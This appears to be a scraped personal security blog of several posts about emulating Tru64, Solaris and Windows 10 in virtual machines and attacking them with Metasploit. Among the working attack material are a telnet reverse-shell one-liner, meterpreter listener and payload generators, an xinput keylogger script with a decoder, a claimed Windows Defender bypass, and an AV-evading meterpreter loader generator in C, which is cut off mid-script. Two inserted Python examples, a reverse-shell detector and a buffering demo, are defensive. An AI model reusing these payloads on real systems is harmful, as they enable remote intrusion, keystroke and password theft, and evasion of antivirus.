user             280   0.4  1.3   713228  26736   ??  Ss    9:19AM   0:20.30 /Applications/TrendMicro.localized/iTIS.app/Contents/MacOS/iTIS -update
root             364   0.0  2.2   652028  45640   ??  Ss    9:20AM   0:21.90 /Library/Application Support/TrendMicro/TmccMac/iCoreService_av -p 61301 -n 61100 /Library/Application Support/TrendMicro/common/lib/libTmAntiMalware.dylib
user             196   0.0  0.5   690412  10752   ??  S     9:13AM   0:01.49 /Library/Application Support/TrendMicro/TmccMac/UIMgmt.app/Contents/MacOS/UIMgmt
root              62   0.0  0.2   617688   3472   ??  Ss    9:11AM   0:06.00 /Library/Application Support/TrendMicro/TmccMac/iCoreService -p 61100 -n 61100 /Library/Application Support/TrendMicro/common/lib/libnamingService.dylib /Library/Application Support/TrendMicro/common/lib/libtaskManager.dylib /Library/Application Support/TrendMicro/common/lib/libnotificationService.dylib /Library/Application Support/TrendMicro/common/lib/libTmUpdate.dylib /Library/Application Support/TrendMicro/common/lib/libTmDb.dylib
root              61   0.0  0.2   617520   3912   ??  Ss    9:11AM   0:00.31 /Library/Application Support/TrendMicro/TmccMac/iCoreService_wp -p 61201 -n 61100 /Library/Application Support/TrendMicro/common/lib/libTmProxy.dylib
root              59   0.0  0.2   628928   4128   ??  Ss    9:11AM   0:00.65 /Library/Application Support/TrendMicro/TmccMac/iCoreService -p 61401 -n 61100 /Library/Application Support/TrendMicro/Plug-in/iTISPlugin.framework/iTISPlugin
root             481   0.0  0.0  2433436      0   ??  R     9:41AM   0:00.00 grep Trend

And here is the whole process summary in a short video:



Running Tru64 UNIX inside a VM for Metasploit testing


With virtualization technology nowadays it is possible to emulate almost anything, and for those who wish to play around with not-so-common operating systems for the Alpha processor family there is a great piece of software called EmuVM, available for free for either Windows or Linux here: emuvm.com/downloads.php

This emulator is capable of emulating a number of Alpha servers and is probably the best choice for a modern 64-bit Linux system. I have made all tests on Debian 64-bit with a GRSEC-patched kernel 3.6.55. There is very little information about installing and running Tru64 UNIX inside a VM, so I have decided to fill this gap with some of my findings. I will also show you how to perform some simple Metasploit operations against the Tru64 system.

So the first thing is obtaining a copy of the EmuVM software from the above link; I have used the stable version alphavm-free-1-3-9.tgz. Once unpacked there are two important files, the alphavm binary and the configuration file. Below is the configuration file I used to install Tru64 5.1B, which emulates an AlphaServer DS10 616 MHz.

Here is the example config.emu for the above model:

system {
  type = ds10_616;
  reported_type = default;
  num_cpus = 1;
  ssn = 'EmuVM-00-000-001';
  interval_clock_freq = 1000;
  memory {
    size = 512;
  }
  cpu {
    server = basic;
    jit {
      async = yes;
    }
  }
  serial com1 {
    server = socket;
    port = 3000;
  }
  serial com2 {
    server = socket;
    port = 3001;
  }
  scsi_controller qla0 {
    scsi_id = 7;
  }
  scsi_controller qla1 {
    scsi_id = 7;
  }
  scsi_disk dka0 {
    scsi_bus = 0;
    scsi_id = 0;
    scsi_lun = 0;
    file = 'disk.dd';
    caching = no;
    write_through = yes;
  }
  scsi_cdrom iso {
    scsi_id = 4;
    file = 'Tru64.iso';
  }
  ether eth0 {
    type = dec21040;
    server = dummy;
    mac_address = 0x08002B000001;
  }
  ether eth1 {
    type = dec21040;
    server = tap;
    interface = 'tap0';
    mac_address = 0x08002B000002;
  }
}

The important parts in this config file are the virtual disk location and the network card settings. I have kept all the files in the folder where the alphavm binary resides. In order to install Tru64 onto a hard disk we need to prepare a file on our host that will hold the system (2 GB is enough):

dd if=/dev/zero of=disk.dd bs=1024 count=2M

Once we have this, the next step is getting the installation media for the actual Tru64 system. If you have the CDs you can just dd them into an ISO; if not, have a look on The Pirate Bay, there is a torrent that has the following:

-rw-r--r-- 1 user user 443 Feb 8 10:00 README.txt
-rw-r--r-- 1 user user 216601968 Feb 8 10:00 T64V51BB27AS0006_install.iso.bz2
-rw-r--r-- 1 user user 427318884 Feb 8 10:00 Tru64_5.1B_GNU_VOL1.img.bz2
-rw-r--r-- 1 user user 531119101 Feb 8 10:00 Tru64_5.1B_PORT_VOL1.img.bz2
-rw-r--r-- 1 user user 429326071 Feb 8 10:00 V5.1Br2650_A1.iso.bz2
-rw-r--r-- 1 user user 343522410 Feb 8 10:00 V5.1Br2650_A2.iso.bz2
-rw-r--r-- 1 user user 383672280 Feb 8 10:00 V5.1Br2650_O1.iso.bz2

You really only need the install ISO V5.1Br2650_O1.iso.bz2 and the patch ISO T64V51BB27AS0006_install.iso.bz2.

So once you have the ISO and the HDD file in place, boot the VM like so:

./alphavm_free config.emu

And connect to the VM's console via socat like so:

socat -,raw,echo=0,escape=0x1c tcp:127.0.0.1:3000

Of course you can use other programs to connect, like telnet or PuTTY, but there are problems with escape sequences in the terminal emulation; I had the best results with socat.

user@Obelix:~/KVM/Alpha/Tru64$ ./connect.console.sh 
 Welcome to EmuVM hardware emulator.
 Copyright 2010 - 2012, Artem Alimarin. All rights reserved.
 Please visit http://emuvm.com for more information.
show devices
pka SCSI Controller
dka0 SCSI 0 14 0 0 0 0 0
dka400 SCSI 0 14 0 0 400 0 0
pkb SCSI Controller
ewa MOP 0 9 0 0 0 3 0 (08:00:2b:00:00:01)
ewb MOP 0 11 0 0 0 3 0 (08:00:2b:00:00:02)
>>>

So we first need to boot the CD in order to install Tru64. This is done by telling the SRM console which SCSI device to boot from, in our case dka400 (CD-ROM), while dka0 is the HDD:

boot dka400

The ISO boots into single-user mode, from which we can perform the actual installation. Anybody with some Linux/BSD/Unix background can set up the system; it is not difficult and I am not going to cover it here, simply experiment or use the default values in the installer. Once finished you can apply the 5.1B patches from the other ISO to the installed system, but it is not necessary (they must be installed from within Tru64, as the patch CD is not bootable).

Once finished, boot the HDD via:

boot dka0

The most important thing is setting up the network on the host and the guest. First I will show an example of how to configure this via a simple shell script that sets up the tap0 and bridge interfaces. In my scenario I use a laptop with two network cards, wlan0 (wireless) and eth0 (Ethernet). I have decided to use the Ethernet interface for interacting with the guest VM and the wireless for the internet connection. So here is the script that sets up the necessary pieces:

#!/bin/bash
# Run as root before starting alphavm: create a tap device owned by "user",
# bridge it with eth0 and address the bridge so the host can reach the guest.
tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
brctl addif br0 eth0
brctl setfd br0 0
ifconfig eth0 10.0.2.1 up
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
route add -net 0.0.0.0/0 gw 10.0.2.1
brctl addif br0 tap0
ifconfig tap0 0.0.0.0

Explanation: I set up my eth0 as 10.0.2.1 and the Tru64 VM as 10.0.2.10, so the VM and the host can communicate on this subnet. Wireless is on another subnet, but I don't plan to connect the VM to the internet. So before starting AlphaVM run this script first to get the network working. I have used a second virtual interface in config.emu:

ether eth1 {
 type = dec21040; 
 server = tap;
 interface = 'tap0'; 
 mac_address = 0x08002B000002;
}

The first one is just a dummy; the second one uses the tap0 interface. Make sure it does not have the same MAC address as the tap0 device.

On the Tru64 system I have a fixed IP address for the tu1 interface like so:

tu1: flags=c63<UP,BROADCAST,NOTRAILERS,RUNNING,MULTICAST,SIMPLEX>
 inet 10.0.2.10 netmask ffffff00 broadcast 10.0.2.255 ipmtu 1500

So now let's see how we can perform a first test on the virtual Tru64, and whether we can get a reverse shell. As there is very limited info about Alpha shellcode :) we are probably stuck with using something built in, like telnet or perl. A telnet reverse shell works fine. You can try running a Metasploit listener on the host via this script:

#!/bin/bash
clear
echo "***************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo "***************************************************************"
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo " starting the meterpreter listener.."
./msfcli exploit/multi/handler PAYLOAD=cmd/unix/reverse LHOST=10.0.2.1 LPORT=$port E

And run the following command on the target Tru64 system:

sh -c '(sleep 4074|telnet 10.0.2.1 8000|while : ; do sh && break; done 2>&1|telnet 10.0.2.1 8000 >/dev/null 2>&1 &)'

It works well, and for our educational purposes this serves as a good example. I believe there is a book out there called The Shellcoder's Handbook that covers Tru64 security in one dedicated chapter. The examples there can be verified using this VM setup and one can gain some knowledge of Tru64 Unix.
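The telnet one-liner above chains a network client to a shell through pipes, which is exactly the shape a responder should look for in a process listing. Below is an added example (my own code, not from the original post, AlphaVM or Tru64) that parses constructed ps -ef style output and flags such pipelines, plus the weaker signal of telnet/nc talking to a port other than the client's default; the sample lines, PIDs, users and hostnames are made up, and the flagged process is reported together with its children so the whole tree can be dealt with.

```python
import re
from dataclasses import dataclass

# Constructed ps -ef style listing for the demo (PIDs, hostnames and times are
# made up; the command on PID 2244 is the telnet reverse shell from the post).
SAMPLE_PS = """\
     UID   PID  PPID  C    STIME TTY      TIME CMD
    root     1     0  0   Jan 01 ??       0:01 /sbin/init
    root   412     1  0   Jan 01 ??       0:00 /usr/sbin/inetd
    user  2201  2188  0 10:12:03 pts/0    0:00 -sh
    user  2244  2201  0 10:14:51 pts/0    0:00 sh -c (sleep 4074|telnet 10.0.2.1 8000|while : ; do sh && break; done 2>&1|telnet 10.0.2.1 8000 >/dev/null 2>&1 &)
    user  2245  2244  0 10:14:51 pts/0    0:00 telnet 10.0.2.1 8000
    user  2246  2244  0 10:14:51 pts/0    0:00 sh
    user  2310  2201  0 10:20:07 pts/0    0:00 telnet mailhost 25
    user  2311  2201  0 10:20:09 pts/0    0:00 vi notes.txt
"""

PS_LINE = re.compile(
    r"^\s*(?P<uid>\S+)\s+(?P<pid>\d+)\s+(?P<ppid>\d+)\s+\d+\s+"
    r"(?:\S+\s+){1,2}"                  # STIME is "HH:MM:SS" or "Mon DD"
    r"(?P<tty>\S+)\s+\d+:\d\d\s+(?P<cmd>.*\S)\s*$"
)

NET_CLIENTS = {"telnet", "nc", "ncat", "netcat"}
SHELL_WORD = re.compile(r"\b(?:sh|bash|ksh|csh|zsh)\b")   # \b keeps "ssh" from matching
CLIENT_PORT = re.compile(r"^(telnet|nc|ncat|netcat)\s+\S+\s+(\d{1,5})\b")
DEFAULT_PORTS = {"telnet": 23}


@dataclass
class Proc:
    uid: str
    pid: int
    ppid: int
    cmd: str


def parse_ps(text):
    """Parse ps -ef style output into {pid: Proc}; the header and junk lines are skipped."""
    procs = {}
    for line in text.splitlines():
        m = PS_LINE.match(line)
        if m:
            p = Proc(m.group("uid"), int(m.group("pid")), int(m.group("ppid")), m.group("cmd"))
            procs[p.pid] = p
    return procs


def classify(cmd):
    """Return (severity, reason) for a suspicious command line, or None."""
    segments = [s.strip() for s in cmd.split("|") if s.strip()]
    starts_with_client = any(seg.split()[0] in NET_CLIENTS for seg in segments)
    mentions_shell = any(SHELL_WORD.search(seg) for seg in segments)
    # High: a shell and a network client joined by a pipeline (reverse shell shape).
    if len(segments) > 1 and starts_with_client and mentions_shell:
        return "high", "shell wired to a network client through a pipeline"
    # Low: a bare client talking to a port other than its default (e.g. telnet to 8000).
    for seg in segments:
        m = CLIENT_PORT.match(seg)
        if m and int(m.group(2)) != DEFAULT_PORTS.get(m.group(1)):
            return "low", f"{m.group(1)} to non-default port {m.group(2)}"
    return None


def scan(ps_text):
    """Scan a process listing; each finding carries the flagged process's children."""
    procs = parse_ps(ps_text)
    children = {}
    for p in procs.values():
        children.setdefault(p.ppid, []).append(p.pid)
    findings = []
    for p in sorted(procs.values(), key=lambda x: x.pid):
        hit = classify(p.cmd)
        if hit:
            findings.append({
                "pid": p.pid, "uid": p.uid, "severity": hit[0], "reason": hit[1],
                "children": sorted(children.get(p.pid, [])), "cmd": p.cmd,
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_PS):
        print(f"[{f['severity']}] pid={f['pid']} user={f['uid']} children={f['children']}: {f['reason']}")
        print(f"        {f['cmd']}")
```

On the constructed listing the wrapper process 2244 is reported as high with children 2245 and 2246, while the two plain telnet processes are only low-severity hints; the "telnet mailhost 25" line shows why the port heuristic alone is not enough to act on.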

Here is a little video demonstration of the above Metasploit test against Tru64


Setting up X11 on Tru64 VM via VNC


OK, so we have Tru64 up and running inside AlphaVM and now we want a fancy X11 desktop with the CDE window manager. Here is a quick howto for setting up vncserver and CDE on Tru64. You will need the GNU application CD with the label “OSSC V5.1B RPM Installation Disc”, which contains all the necessary files.

So first attach the ISO in the config.emu file:

scsi_cdrom iso {
 scsi_id = 4;
 file = 'gnu.tru64.iso';
}

After we boot the system, mount the CD-ROM under /mnt:

# mount /dev/disk/cdrom0a /mnt

then go to the SETUP folder and run the RPM-init.ksh shell script:

cd /mnt/SETUP
./RPM-init.ksh

Then you can install the VNC RPM package for the Alpha processor:

cd /mnt/RPMS/
/usr/local/bin/rpm -i vnc-3.3.3-2.alpha.rpm

Once installed, copy the following files from /usr/local/bin to /usr/bin/X11:

cp /usr/local/bin/Xvnc /usr/bin/X11
cp /usr/local/bin/vncpasswd /usr/bin/X11
cp /usr/local/bin/vncserver /usr/bin/X11

This step is important, otherwise the vncserver binary won't run and you will have to figure out how to set up $PATH for the user on Tru64.

Once you have the files copied you can start vncserver. I started mine from / and it created a hidden directory .vnc in the root folder. The .vnc directory contains the xstartup file, which we need to modify in order to use the CDE window manager, so that it contains only this:

/usr/dt/bin/Xsession &

OK, we are done now, and you can connect with a VNC client from your host via the guest's virtual IP address (in my example tap0 0.0.0.0, br0 10.0.2.2 and Tru64 tu1 10.0.2.10 with gw 10.0.2.2):

xvncviewer 10.0.2.10:1

Here is the resulting desktop (screenshot).


Solaris 11 and Metasploit


Just to follow up on the different OS scenarios from the previous posts, here is a test done on Solaris 11.1 x86 in QEMU-KVM. The setup is nothing special: the standard way of creating a qcow2 HDD image and launching the VM. Here is my script that does that:

kvm -m 1024 -vga vmware -drive file=hdd.img,cache=none,index=1 -net nic,model=rtl8139,macaddr=10:1f:74:56:47:58 -net user


Once the system is up, set up a Java meterpreter listener on the host and generate a Java payload for the Solaris guest. I have used the same scripts as for OSX, since both use the Java meterpreter:

clear
echo "************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo "************************************************************"
echo -e "What IP are we gonna use ? \c"
read IP
echo -e "What Port Number are we gonna listen to? : \c"
read port
./msfpayload java/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R > test.jar
mkdir ShellCode
mv test.jar ShellCode
echo "test.jar generated in ShellCode folder..."

The listener is identical:

#!/bin/bash
clear
echo "***************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo "***************************************************************"
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo " starting the meterpreter listener.."
./msfcli exploit/multi/handler PAYLOAD=java/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=$port E

The generated jar file should be placed on the guest Solaris and executed for demonstration. Again this is just a simulation, nothing that a normally savvy admin would do :) So let's just pretend the file is there and the user “double clicks it”.

The Java meterpreter payload works as expected and we get a reverse shell on our host. Let's try and exploit xinput under Xorg to get some user keyboard input.

In order to exploit the xinput keylogging capability I had to change the initial Linux xinput keylog script just a little, like so:

#!/bin/bash
export DISPLAY=:0.0
xinput list
echo -e "KBD ID ?"
read kbd
xmodmap -pke > /tmp/.xkey.log
script | xinput test $kbd >> /tmp/.xkey.log &
exit

The script command on Solaris does not accept the -c parameter as it does in various Linux distributions, so we cannot tell it which command to run. There is also this little catch: when stdout is not a terminal (we redirect to .xkey.log), output is buffered in 4k chunks. If you hit CTRL+C the buffer gets lost, so we just need to exit the shell once the logger starts and wait for user input on the keyboard. The file .xkey.log will then grow 4k at a time.
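To make the buffering point above concrete, here is an added example (mine, not code from the original post) that mimics a 4 KiB block buffer on a file that is not a terminal: a child interpreter writes 100 lines of 50 bytes through a block-buffered file and then either closes it normally, flushes after every line, or dies abruptly via os._exit (no flush, the same effect as a C program killed before stdio gets to flush). The function returns how many bytes actually reached the disk. Python stands in for Solaris stdio here, and the 4096-byte buffer size is an assumption set explicitly in the code.

```python
import os
import subprocess
import sys
import tempfile

LINE_LEN = 50
N_LINES = 100
BUFFER_SIZE = 4096   # assumed 4 KiB block buffer, the size the post describes for a non-tty stdout

# Child program, run in a separate interpreter so that os._exit() cannot take the
# caller down with it (constructed example, not code from the post).
CHILD = r"""
import os, sys
path, mode = sys.argv[1], sys.argv[2]
n, line_len, bufsize = int(sys.argv[3]), int(sys.argv[4]), int(sys.argv[5])
line = b"k" * (line_len - 1) + b"\n"
f = open(path, "wb", buffering=bufsize)    # block buffered, like stdio on a non-tty
for _ in range(n):
    f.write(line)
    if mode == "flush":
        f.flush()                          # push every line to the file immediately
if mode == "clean":
    f.close()                              # orderly exit: the buffer is flushed
os._exit(0)                                # abrupt death: whatever is still buffered is lost
"""


def bytes_on_disk(mode, n_lines=N_LINES, line_len=LINE_LEN, bufsize=BUFFER_SIZE):
    """Run the child in the given mode ('clean', 'flush' or 'abrupt') and
    return how many bytes of its output ended up in the log file."""
    if mode not in ("clean", "flush", "abrupt"):
        raise ValueError(f"unknown mode {mode!r}")
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "xkey.log")
        subprocess.run(
            [sys.executable, "-c", CHILD, path, mode,
             str(n_lines), str(line_len), str(bufsize)],
            check=True,
        )
        return os.path.getsize(path)


if __name__ == "__main__":
    total = N_LINES * LINE_LEN
    for mode in ("clean", "flush", "abrupt"):
        got = bytes_on_disk(mode)
        print(f"{mode:6s}: {got:5d} of {total} bytes reached the file")
```

In the abrupt case only the part of the output that already filled one 4 KiB buffer is on disk; the last few hundred bytes never leave the process, which is the loss the post describes, while a clean exit or an explicit flush per line gets all 5000 bytes out.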

After some time, the .xkey.log gets downloaded from /tmp and decoded by the following script:

#!/bin/sh
cat .xkey.log | grep keycode > xmodmap.pke
cat .xkey.log | grep 'key p' > xlog
rm -f .xkey.log
#Generating some Python to do the decoding
echo 'import re, collections, sys' > decoder.py
echo 'from subprocess import *' >> decoder.py
echo 'def keyMap():' >> decoder.py
echo '    table = open("xmodmap.pke")' >> decoder.py
echo '    key = []' >> decoder.py
echo '    for line in table:' >> decoder.py
echo "        m = re.match('keycode +(\d+) = (.+)', line.decode())" >> decoder.py
echo '        if m and m.groups()[1]:' >> decoder.py
echo '            key.append(m.groups()[1].split()[0]+"_____"+m.groups()[0])' >> decoder.py
echo '    return key' >> decoder.py
echo 'def printV(letter):' >> decoder.py
echo '    key=keyMap();' >> decoder.py
echo '    for i in key:' >> decoder.py
echo '        if str(letter) == i.split("_____")[1]:' >> decoder.py
echo '            return i.split("_____")[0]' >> decoder.py
echo '    return letter' >> decoder.py
echo 'if len(sys.argv) < 2:' >> decoder.py
echo '    print "Usage: %s FILE" % sys.argv[0];' >> decoder.py
echo '    exit();' >> decoder.py
echo 'else:' >> decoder.py
echo '    f = open(sys.argv[1])' >> decoder.py
echo '    lines = f.readlines()' >> decoder.py
echo '    f.close()' >> decoder.py
echo '    for line in lines:' >> decoder.py
echo "        m = re.match('key press +(\d+)', line)" >> decoder.py
echo '        if m:' >> decoder.py
echo '            keycode = m.groups()[0]' >> decoder.py
echo '            print (printV(keycode))' >> decoder.py

echo 'Please see LOG-keylogger for the output......'
python decoder.py xlog > LOG
sed ':a;N;$!ba;s/\n/ /g' LOG > LOG-keylogger
rm -f LOG
rm -f xmodmap.pke
rm -f decoder.py
rm -f xlog
cat LOG-keylogger

Once you have the root password :) you can do the following from the Meterpreter shell in order to elevate to root:

sudo -S su

And here is a video demonstration of the above process:


Old tRusty Thinkpad X23


Just a note to myself here. I have dug up my old laptop from 2002 and tried to put it to some use again, as I have managed to get the battery replaced. It is an old Pentium 3 CPU with a stunning 8MB ATI Radeon Mobility M6 LY graphics adapter.

I know of nothing better (from my experience) than NetBSD for such old hardware. It has always been a main pillar of all my *nix experience, by using it, experimenting, compiling and sometimes hacking.

There are almost always some troubles to be expected when dealing with old hardware. I have prepared a virtual machine on KVM and installed a stable NetBSD 6.1. NetBSD has native support for virtio drivers in its GENERIC kernel, so there was no problem with using it in KVM-QEMU:

kvm -m 1024 -vga vmware -drive file=netbsd.qcow,cache=none,if=virtio

The next step was to do the following basics I always do with fresh NetBSD installs: get pkgsrc, install tcsh, the modular-xorg stuff and fluxbox. Once this is set up and ready, next is to CVS checkout the current NetBSD source tree. Once done I build (in my case cross-compile on amd64) an i386 current release and install ISO. I'm not gonna cover this here as there is a complete step-by-step on the NetBSD wiki: https://wiki.netbsd.org/tutorials/how_to_build_netbsd-current/

So after about 8 hours (the compilation time on virtualized NetBSD 6.x in KVM-QEMU on a Core i5 with 4GB RAM) the whole distribution is ready along with a bootable ISO (userland, kernels and xorg). The current version is NetBSD 7.99.1.

When I booted the install CD the default GENERIC kernel got loaded and I got a nice error message in the console, looping like this:

auich0: read_codec timeout

This loops and the boot gets stuck. OK, so there seems to be some problem with the audio device and the new GENERIC kernel. So I decided to check the sources of the GENERIC kernel config and disable the auich entry to see if we can get any further.

The config for the GENERIC kernel sits in current/sys/arch/i386/conf/GENERIC and I have commented out the following line:

#auich* at pci? dev ? function ?   # Intel ICH integrated AC'97 Audio

Then I recompiled the distribution again. While compiling I remembered that one can issue a boot -c command in the NetBSD boot loader to select individual modules to be loaded. Unfortunately I had not enabled this option in the GENERIC kernel, so I had to wait for the build process to finish. Once done, the system booted fine without any issues and I could set up the whole distribution.

First thing after rebooting into the freshly installed system I wanted to see if Xorg works, so as root I quickly tested it like so: #Xorg -configure. But it bailed out with the dreadful error “number of created screens does not match number of detected devices”. OK, a quick look in /var/log/Xorg.0.log showed that no drivers were loaded. I searched the internet for these issues and came up only with some people complaining about the new Xorg and libpciaccess not detecting the VGA device properly. More problems again :)

So the next thing I tried was to reinstall the system without Xorg, use the pkgsrc modular-xorg and compile it natively on the X23. This took another day to finish. When all was done the error was the same with Xorg -configure: number of created screens does not match number of detected devices.

This was getting frustrating (some people might think: why the hell stick with NetBSD and why not use Linux?). I liked the challenge and really wanted to get things up and working, as this proved to be a good exercise after all. I searched through my CD archive and found that I had an old NetBSD 5.99.8 release from 2009. Good, I booted this one – no auich errors (sound will work), installed it with all packages, Xorg included, ran Xorg -configure and all worked fine; I got a nice TWM with xterms. OK, next was to build tcsh and fluxbox from pkgsrc, which went fine. Next eterm for the fluxbox wallpaper background.

The next problems were encountered while compiling GTK2+, as this package is dependent on many Xorg libraries and I am using the old native X11R7. Eventually, after a few hours of compilation, the process died with errors regarding some X11 library version mismatch. I can compile all tools fine that are not dependent on GTK2+, but for the browsers I was stuck with elinks or dillo. All others (there aren't many) depend on GTK. So my next step was to try my luck in compiling an older GTK2 from source (not pkgsrc) and try to build firefox 3.6.28 from scratch. This is an ongoing process so I will write about this later :)


Sometimes I have a feeling that this orthodox way of using a computer is the key to understanding how the whole system and software works. When things are too easy one does not learn anything, especially when everything has been done for you beforehand.



Annoying Skype forced upgrade on Linux


Skype forces you to upgrade…. Fortunately there is a quick “fix”:

ver=$(echo "4.2.0.11" | xxd -p | sed 's/.\{2\}/&\\x/g;s/^/\\x/;s/\\x0a\\x//'); echo "sudo sed -i \"s/$ver/\x34\x2E\x33\x2E\x30\x2E\x33\x37/g\" /usr/bin/skype"

Here is a link to the old Debian Skype 4.2.0.11 package in case it is needed: skype

Just rename it to skype.deb and install.

Works.



Windows 10 preview


Honestly, when somebody said recently “hey, did you know that Windows 10 was released…” I thought he was joking. It was released, the guy was not joking, and I suddenly wondered if I had somehow jumped ahead in time. Wake me up when there is Windows 1000, or Windows 1k…. hey, there was Windows 2000 …. uuuh. Let's just call it WinX for now (how about a Greek WinI mutation? :) )

The only tests I have done so far were running the custom meterpreter loader from here: Customizing custom Meterpreter loader

We get a successful reverse shell and can do a whole bunch of things with the meterpreter shell (sniffing, migrating, killing processes… etc.), thus bypassing the built-in Windows Defender. The interesting thing is this:

meterpreter > ps

Process List
============

 PID PPID Name Arch Session User Path
 --- ---- ---- ---- ------- ---- ----
 0 0 [System Process] 4294967295
 4 0 System x86_64 0
 228 4 smss.exe x86_64 0
 264 496 svchost.exe x86_64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
 312 304 csrss.exe x86_64 0
 380 372 csrss.exe x86_64 1
 392 304 wininit.exe x86_64 0
 424 372 winlogon.exe x86_64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
 496 392 services.exe x86_64 0
 504 392 lsass.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
 572 496 svchost.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
 616 496 svchost.exe x86_64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
 660 496 spoolsv.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
 712 424 dwm.exe x86_64 1 Window Manager\DWM-1 C:\Windows\System32\dwm.exe
 780 496 svchost.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
 828 496 svchost.exe x86_64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
 844 496 svchost.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
 876 496 svchost.exe x86_64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
 920 496 svchost.exe x86_64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
 1028 780 WMIADAP.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wbem\WMIADAP.exe
 1348 2968 SearchFilterHost.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchFilterHost.exe
 1376 496 MsMpEng.exe x86_64 0
 1600 496 svchost.exe x86_64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
 1740 844 dasHost.exe x86_64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\dasHost.exe
 1920 496 svchost.exe x86_64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
 2240 572 WmiPrvSE.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wbem\WmiPrvSE.exe
 2312 572 dllhost.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dllhost.exe
 2428 2544 payload.exe x86 1 WIN-MH5TUAFR3AP\user C:\Users\user\Desktop\payload.exe
 2452 2968 SearchProtocolHost.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchProtocolHost.exe
 2524 780 taskhostex.exe x86_64 1 WIN-MH5TUAFR3AP\user C:\Windows\System32\taskhostex.exe
 2544 2500 explorer.exe x86_64 1 WIN-MH5TUAFR3AP\user C:\Windows\explorer.exe
 2968 496 SearchIndexer.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchIndexer.exe


meterpreter >

There are some processes that are inaccessible even with NT AUTHORITY\SYSTEM rights:

 312 304 csrss.exe x86_64 0
 380 372 csrss.exe x86_64 1
 392 304 wininit.exe x86_64 0

We cannot migrate to these processes, so I guess they are separated on the kernel level from the userland.

Here is a video demonstration of the above.


Yet another Windows 10 post after some time


I have not had much time lately to post anything, as too many sad things are happening around the world. Unfortunately these have kept me busy for these past few months, as I have tried hard to analyze the news coming to me from various sources. It saddens me too much to see so many people suffer, especially in Ukraine. A few years back I visited Ukraine for the first time and found out to my amazement that this place (where I visited) was exactly as alive as I remember my neighborhood from my childhood, where I grew up. No exact places, just a mention, a simple feeling, as there is way too much hatred among the Ukrainians already. The greens between the blocks of flats were alive with children playing, screaming and shouting. Just like I remember my childhood from my place, which nowadays is silent and empty. Except that the streets are filled up with fancy cars, kids sit at home by their computers and neighbors don't give a fuck about each other …..

I have dug up some old “dash-screen” recording from some “pen-test” session which I think some might enjoy. Anyway, the music just “fits” the recording, so I think the whole video is self-explanatory. As usual – Metasploit, Windows 10, ESET and some script-fu.


Enjoy, and let's hope there is still some sanity left :)



Windows 10 UAC bypass with custom Meterpreter payloads


I have promised myself to try this exercise to show how this is done.

We have the following scenario:
———————————
Windows 10 Local/Domain user with Admin privileges
Malicious link to “BeEF website” that is opened via Google Chrome on Windows 10
———————————

In this case I have used the following software:

– Windows 10 W10PRO.VLX64.MULTi7.Apr2016.iso
– Metasploit framework current
– Some “script-fu” (custom meterpreter payload generator – read my previous posts)
– BeEF http://beefproject.com/
– Akagi64.exe from https://github.com/hfiref0x/UACME
– VirtualBox
– And of course some trusty Linux system ;)

My custom payload generator script is this:

#!/bin/bash
clear
echo "****************************************************************"
echo "    Automatic C source code generator - FOR METASPLOIT          "
echo "           Based on rsmudge metasploit-loader                   "
echo "****************************************************************"  
echo -en 'Metasploit server IP : '
read ip
echo -en 'Metasploit port number : '
read port

echo '#include <stdio.h>'> temp.c
echo '#include <stdlib.h>' >> temp.c
echo '#include <winsock2.h>' >> temp.c
echo '#include <windows.h>' >> temp.c
echo -n 'unsigned char server[]="' >> temp.c
echo -n $ip >> temp.c
echo -n '";' >> temp.c
echo '' >> temp.c
echo -n 'unsigned char serverp[]="' >> temp.c
echo -n $port >> temp.c
echo -n '";' >> temp.c
echo '' >> temp.c
echo 'void winsock_init() {' >> temp.c
echo '    WSADATA    wsaData;' >> temp.c
echo '    WORD    wVersionRequested;' >> temp.c
echo '    wVersionRequested = MAKEWORD(2, 2);'>> temp.c
echo '    if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> temp.c
echo '         printf("bad\n"); '>> temp.c
echo '         WSACleanup(); '>> temp.c
echo '        exit(1);'>> temp.c
echo '    }' >> temp.c
echo ' }' >> temp.c
echo ' void punt(SOCKET my_socket, char * error) {' >> temp.c
echo '    printf("r %s\n", error);'>> temp.c
echo '    closesocket(my_socket);'>> temp.c
echo '    WSACleanup();'>> temp.c
echo '    exit(1);' >> temp.c
echo ' }' >> temp.c
echo ' int recv_all(SOCKET my_socket, void * buffer, int len) {' >> temp.c
echo '    int    tret   = 0;'>> temp.c
echo '    int    nret   = 0;'>>temp.c
echo '    void * startb = buffer;'>> temp.c
echo '    while (tret < len) {'>>temp.c
